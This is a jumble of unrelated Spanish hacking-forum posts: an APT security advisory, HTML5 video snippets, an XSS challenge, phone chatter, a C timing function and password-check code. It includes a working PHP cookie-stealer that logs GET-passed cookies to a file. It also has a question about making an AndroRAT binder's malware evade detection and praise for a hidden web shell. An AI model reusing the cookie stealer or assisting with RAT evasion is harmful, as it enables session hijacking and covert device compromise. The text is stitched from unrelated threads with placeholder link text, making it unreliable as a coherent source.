Ha sido descubiertas varias vulnerabilidades críticas en el gestor de paquetes de alto nivel APT (Advanced Package Tool) el cual utilizan Debian y Ubuntu, además de una impresionante cantidad de distribuciones derivadas.


Estas vulnerabilidades que se corrigen con una simple actualización, implican a la verificación de la integridad de las descargas.

Se descubrió que APT no invalidaba correctamente los datos no autenticados, problemas con la suma de verificación cuando se usa la opción Acquire::GzipIndexes, junto con una validación erronea de los códigos 304 y una incorrecta certificación de los paquetes binarios descargados mediante la opción apt-get download.

Tecnicismos aparte... la explotación de estas vulnerabilidades (de lo cual no hay ninguna constancia por ahora) podría dar lugar a ataques man-in-the-middle y descargar falsos paquetes manipulados por terceros.

Pero como siempre una de las ventajas del software libre es la velocidad a la hora de corregir cualquier tipo de vulnerabilidad y desde hace 24-48 horas ya existen nuevas versiones de APT disponibles:

-Ubuntu:

Ubuntu 14.04 LTS: apt 1.0.1ubuntu2.3

Ubuntu 12.04 LTS: apt 0.8.16~exp12ubuntu10.19

Ubuntu 10.04 LTS: apt 0.7.25.3ubuntu9.16

-Debian:

Debian Stable (Wheezy): apt 0.9.7.9+deb7u3

Debian Sid: apt 1.0.9

No es preciso hacer nada especial para instalar estas actualizaciones simplemente ejecutar desde la terminal:

sudo apt-get update
 
sudo apt-get upgrade

Y ya estamos al día con todos los paquetes de nuestra distro actualizados (paradójicamente utilizando APT.

Una vez actualizado (o antes) podéis ver la versión que estáis utilizando de APT ejecutando

aptitude show apt

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Para que funcione el vídeo utiliza HTML5

<video width="320" height="240" controls>
  <source src="movie.mp4" type="video/mp4">
  <source src="movie.ogg" type="video/ogg">
  Your browser does not support the video tag.
</video>

Y si quieres reproducción automática....

 <video width="320" height="240" autoplay>
  <source src="movie.mp4" type="video/mp4">
  <source src="movie.ogg" type="video/ogg">
Your browser does not support the video tag.
</video> 

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hola:
He descargado y configurado androrat binder y despues de crear varias aplicaciones con el binder las he provado en el movil y ni si quiera me deja abrirlas,
¿Sera que lo ha detectado como archivo malicioso? porque no recuerdo haber instalado ninguna av en el movil,¿Que se os ocurre?, ¿Es posible encriptar este tipo de malware como se hacia con los viejos troyanos?.

¿Has activado el permiso para los orígenes desconocidos en el teléfono?

¡Buenas a todos!
Se trata de un reto de XSS, no se filtra casi nada, la dificultad única está en el contexto.
URL: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Objetivo: ejecutar alert(0) en el servidor.
Normas: no fuzzear ni utilizar herramientas automatizadas para no consumir el ancho de banda.
Para pasar el reto deben postear un screenshot tapando el payload y enviarme un MP con su solución, OJO: debe ser explotable en las últimas versiones de Chrome, Firefox e IE en sus configuraciones por defecto.

El reto se me ocurrió durante un Bug Bounty que utilizaba un filtro parecido al que yo he implementado

PD: absolutamente todo lo que ocurre está previsto, también los posibles errores 404.

Ganadores:
Blackdrake (URI) --------> solución esperada, funcional en todos los navegadores.
Arthusu (URI) ---------> solución esperada + encoding, funcional en todos los navegadores.


Reto cerrado, solución en comentarios.



Saludos.

Este reto no lo había visto O.o
Solved!

Grande Fermino, +1

Ya te he enviado el MP, saludos.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
disculpa, porque no lo puedo descargar de dropbox?

Lo acabo de probar y funciona perfectamente, prueba desde un firefox actualizado a ver si te deja descargarlo.
Saludos.

Por Twitter hay una imagen en la que se compara el hardware de iPhone 6 y Nexus 4 (ya no se fabrica, Google no lo vende), y están igualados, siendo el Nexus 4 bastante viejo ya.
De cualquier modo he de decir que tengo el Nexus 4 y estoy muy contento con su funcionamiento, he tenido durante semanas un iPhone que me prestaron (4S) y sin duda alguna me quedo con el Nexus 4.

Saludos y fuck Apple and taliapples!

<?php
    $cookie = $HTTP_GET_VARS["cookie"];
    $steal = fopen("cookie.txt", "a");
    fwrite($steal, $cookie ."\n");
    fclose($steal);
?>

Busqué ahora rápido por Google y vi esto, sufre en Windows, bajo Linux corre perfecto:
Revisa aquí: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#include <stdio.h>
#include <time.h>
#include <sys/time.h>

/* retorna "a - b" en segundos */
double timeval_diff(struct timeval *a, struct timeval *b)
{
  return
    (double)(a->tv_sec + (double)a->tv_usec/1000000) -
    (double)(b->tv_sec + (double)b->tv_usec/1000000);
}

int main(int argc, char *argv[])
{
  struct timeval t_ini, t_fin;
  double secs;

  gettimeofday(&t_ini, NULL);
  /* ...hacer algo... */
  gettimeofday(&t_fin, NULL);

  secs = timeval_diff(&t_fin, &t_ini);
  printf("%.16g milliseconds\n", secs * 1000.0);
  return 0;
}

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Genial!, me encanta este tipo de shells, totalmente ocultas . Unicamente... podrias hacer que no apareciera la password en la url??

Lamentablemente la contraseña saldrá en la URL siempre.

Saludos.

Si envías la pass por el método POST no aparecerá en la URL.

Edité el mensaje anterior y te dejé la solución con Javascript, ¿puedo marcar ya el tema como solucionado?
PD: si lo que quieres es otra cosa en lugar del alert solo tienes que modificar el código.
Saludos.

Con PHP es fácil:

if ($_POST["password"] == $_POST["confirm_password"]) {
   // acción en caso correcto
}
else {
   // acción en caso incorrecto
}

En tiempo de ejecución puedes usar Javascript:

if (password.value != confirmpassword.value) { 
   alert("Las contraseñas deben coincidir.");
   confirmpassword.focus();
   return false; 
}

Ale, solucionado.

Puedes llevar Vidalia (TOR) en un USB e instalarlo en el equipo, lo conectas y ya te dejará navegar de forma libre.

Yo tengo la primera, me llegó ayer a casa y funciona de lujo, al menos la que venden en Amazon.
Saludos black!

Como ya te dije, estaba de vacaciones y regresé anoche.
Aquí la captura, lo demás te lo mandé por irc.

Sale en la primera página si googleas tío...

http://www.forosdelweb.com/f18/modificar-archivo-php-desde-otro-php-453437/

Hey sir! Here is my bug, please send me a reward, I did a hard work, please, fix as soon as possible and send me my reward ($100000).

Prueba algo como lo de este vídeo en el minuto 2:00


De todas formas te recomiendo leer Nmap 6.0 cookbook, un gran libro que está disponible gratis en el blog de Snifer (creo).
Saludos.